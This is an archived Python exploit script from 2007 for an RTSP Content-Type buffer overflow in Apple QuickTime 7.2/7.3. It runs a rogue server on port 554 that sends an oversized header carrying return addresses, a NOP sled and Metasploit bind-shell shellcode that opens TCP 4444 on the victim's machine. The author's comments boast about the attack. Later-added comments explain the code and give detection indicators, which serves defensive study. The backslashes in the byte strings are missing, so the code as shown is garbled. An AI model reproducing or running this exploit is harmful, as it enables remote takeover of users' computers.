# Title : Apple QuickTime 7.2/7.3 RTSP Response Universal Exploit (IE7/FF/Opera)
# Published : 2007-11-26
# Author : muts
#!/usr/bin/python
##########################################################################
# http://www.offensive-security.com
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: Apple QuickTime Player 7.3 / 7.2 IE7,FF /Opera, XP SP2, Vista
# This exploit is completely "Universal" .... It has also been modded to work via url redirection ...
# Magic RETs work on 7.3,7.2,XPSP2,Vista,IE7,Firefox,Opera....
# re-edited by muts and javaguru1999 to annoy Symantec
# http://www.symantec.com/enterprise/security_response/weblog/2007/11/0day_exploit_for_apple_quickti.html
# there IS NO SPOON!
##########################################################################
# "With Internet Explorer versions 6 and 7, and the Safari 3 beta,
# the attack appears to be prevented because standard buffer overflow
# prevention processes act before any damage can be done, Florio wrote.
# With Firefox, the QuickTime RTSP response is unmoderated. As a result,
# the exploit works against Firefox if QuickTime is the default multimedia player,
# according to Florio."
##########################################################################
# Calling QuickTime via a URL kicks in an extra exception handler,
# over which we have no control.
# By making the buffer larger than the original exploit, we can overwrite
# the last exception handler, and regain control over execution.
# This is indeed an evil exploit - muhaha.
##########################################################################
from socket import *
# RTSP response template returned to whichever client connects.  The
# '%s' slot is the Content-Type value (the author marks it "overflow"):
# the affected player's handling of an oversized Content-Type header is
# the defect this script triggers.  The '%d' slot is filled with the
# length of the SDP body below.  The line-terminator tokens inside the
# literals are reproduced exactly as they appear in the archived listing.
header = (
'RTSP/1.0 200 OKrn'
'CSeq: 1rn'
'Date: 0x00 :Prn'
'Content-Base: rtsp://0.0.0.0/1.mp3/rn'
'Content-Type: %srn' # <-- overflow: this field receives the oversized value
'Content-Length: %drn'
'rn')
# SDP session description used as the response body.  The script only
# uses its length (for Content-Length); the field values themselves look
# like placeholders copied from a benign media description (0.0.0.0
# addresses, a fake track name) and carry no payload.
body = (
'v=0rn'
'o=- 16689332712 1 IN IP4 0.0.0.0rn'
's=MPEG-1 or 2 Audio, streamed by the PoC Exploit o.Orn'
'i=1.mp3rn'
't=0 0rn'
'a=tool:ciamciaramciarn'
'a=type:broadcastrn'
'a=control:*rn'
'a=range:npt=0-213.077rn'
'a=x-qt-text-nam:MPEG-1 or 2 Audio, streamed by the PoC Exploit o.Orn'
'a=x-qt-text-inf:1.mp3rn'
'm=audio 0 RTP/AVP 14rn'
'c=IN IP4 0.0.0.0rn'
'a=control:track1rn'
)
# Payload placed after the overwritten control data.  Per the author's
# annotation on the next line it is a Metasploit win32_bind stub
# (EXITFUNC=process, LPORT=4444, 696 bytes, Alpha2-encoded): it opens a
# listening shell on TCP 4444 of the affected host, and the ExitProcess
# exit strategy terminates the browser process while leaving that shell
# open.  Host-side indicator for responders: an unexpected listener on
# TCP 4444 appearing right after a media-player/browser crash.
# The byte-escape tokens are reproduced exactly as archived.
shellcode =(# win32_bind - EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
"xebx03x59xebx05xe8xf8xffxffxffx49x37x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x49x51x5ax6ax42"
"x58x50x30x42x31x41x42x6bx42x41x52x32x42x42x32x41"
"x41x30x41x41x58x42x50x38x42x42x75x39x79x4bx4cx61"
"x7ax38x6bx50x4dx68x68x69x69x4bx4fx4bx4fx59x6fx53"
"x50x4ex6bx32x4cx44x64x35x74x6ex6bx30x45x57x4cx4e"
"x6bx41x6cx64x45x51x68x46x61x4ax4fx6cx4bx30x4fx46"
"x78x6cx4bx71x4fx47x50x33x31x5ax4bx61x59x6ex6bx50"
"x34x4ex6bx46x61x78x6ex50x31x69x50x4ex79x4ex4cx4b"
"x34x6bx70x52x54x63x37x38x41x6ax6ax44x4dx63x31x6b"
"x72x68x6bx49x64x77x4bx30x54x41x34x45x78x52x55x69"
"x75x6ex6bx73x6fx75x74x56x61x7ax4bx33x56x4ex6bx36"
"x6cx72x6bx4cx4bx53x6fx35x4cx77x71x38x6bx47x73x44"
"x6cx6ex6bx4bx39x32x4cx35x74x77x6cx65x31x69x53x56"
"x51x49x4bx65x34x4ex6bx67x33x34x70x4cx4bx77x30x74"
"x4cx6ex6bx64x30x47x6cx4cx6dx6ex6bx41x50x63x38x53"
"x6ex70x68x4ex6ex62x6ex56x6ex38x6cx52x70x6bx4fx7a"
"x76x72x46x61x43x43x56x52x48x77x43x64x72x51x78x71"
"x67x50x73x70x32x71x4fx31x44x4bx4fx4ax70x75x38x78"
"x4bx68x6dx49x6cx75x6bx46x30x4bx4fx79x46x53x6fx6f"
"x79x38x65x73x56x4cx41x58x6dx64x48x65x52x72x75x32"
"x4ax73x32x49x6fx4ax70x33x58x78x59x63x39x39x65x4c"
"x6dx72x77x6bx4fx6ex36x50x53x52x73x51x43x70x53x33"
"x63x71x53x63x63x61x53x33x63x4bx4fx5ax70x73x56x51"
"x78x37x61x41x4cx50x66x53x63x6cx49x5ax41x5ax35x51"
"x78x4dx74x67x6ax30x70x4bx77x66x37x79x6fx4bx66x41"
"x7ax32x30x72x71x33x65x59x6fx38x50x70x68x6fx54x6e"
"x4dx64x6ex38x69x32x77x4bx4fx4ex36x51x43x41x45x39"
"x6fx4ax70x71x78x4ax45x71x59x6dx56x43x79x76x37x4b"
"x4fx39x46x52x70x72x74x46x34x31x45x4bx4fx68x50x4e"
"x73x43x58x6bx57x71x69x6fx36x53x49x76x37x6bx4fx38"
"x56x71x45x6bx4fx48x50x35x36x70x6ax31x74x45x36x31"
"x78x62x43x32x4dx6fx79x7ax45x71x7ax30x50x33x69x46"
"x49x6ax6cx6bx39x6ax47x73x5ax51x54x6fx79x6dx32x30"
"x31x59x50x38x73x4dx7ax59x6ex43x72x36x4dx69x6ex73"
"x72x54x6cx6fx63x4cx4dx72x5ax74x78x4cx6bx6cx6bx6e"
"x4bx35x38x50x72x6bx4ex4cx73x64x56x4bx4fx43x45x32"
"x64x79x6fx7ax76x33x6bx32x77x62x72x63x61x33x61x30"
"x51x30x6ax53x31x71x41x46x31x52x75x32x71x6bx4fx4e"
"x30x70x68x4ex4dx7ax79x46x65x4ax6ex72x73x69x6fx58"
"x56x72x4ax69x6fx69x6fx66x57x39x6fx58x50x4cx4bx41"
"x47x6bx4cx6cx43x4fx34x32x44x4bx4fx68x56x76x32x4b"
"x4fx4ex30x71x78x33x4ex6ax78x49x72x43x43x61x43x4b"
"x4fx48x56x69x6fx6ax70x42")
# Assemble the oversized Content-Type value.  Layout, as annotated by the
# author: 987 bytes of filler up to the overwritten exception-handler
# record (see the header comment on overwriting the last handler), three
# 4-byte slots holding version-specific jump / pop-pop-ret addresses for
# 7.2 and 7.3, a 92-byte 0x90 sled, the bind-shell payload, and trailing
# padding.  The padding count is 30000 - len(shellcode); the int() call
# is a no-op because both operands are already ints.
tmp = "A" * 987
tmp +="xebx20x90x90" # short jump for 7.2
tmp +="xebx20x9cx66" # 669c20eb | funky magic - pop pop ret for 7.2 / short jump for 7.3
tmp +="x4ex28x86x66" # 6686284e | pop pop ret for 7.3
tmp += "x90" * 92
tmp += shellcode
tmp += "x41" * int(30000-len(shellcode)) # play with this buffer if you still get exceptions.
# Substitute the oversized value and the SDP length into the template;
# Content-Length describes only the SDP body, not the header bloat.
header %= (tmp, len(body))
# Complete on-the-wire response: RTSP headers followed by the SDP body.
evil = header + body
# Single-client TCP listener on the RTSP port (554), bound to all
# interfaces.  Up to 1024 bytes of whatever the client sends (its RTSP
# request) are read and discarded, the crafted response is sent, and the
# script blocks on Enter before closing both sockets.  Written for
# Python 2 (print statement, raw_input).
# Network-side indicator for detection: an RTSP "200 OK" whose
# Content-Type header runs to over 30,000 bytes, where a legitimate value
# is a short MIME type.  Mitigation is the vendor fix for the affected
# player versions named in the header comment.
s = socket(AF_INET, SOCK_STREAM)
s.bind(("0.0.0.0", 554))
s.listen(1)
print "[+] Listening on [RTSP] 554"
c, addr = s.accept()
print "[+] Connection accepted from: %s" % (addr[0])
c.recv(1024)
c.send(evil)
raw_input("[+] Done, press enter to quit")
c.close()
s.close()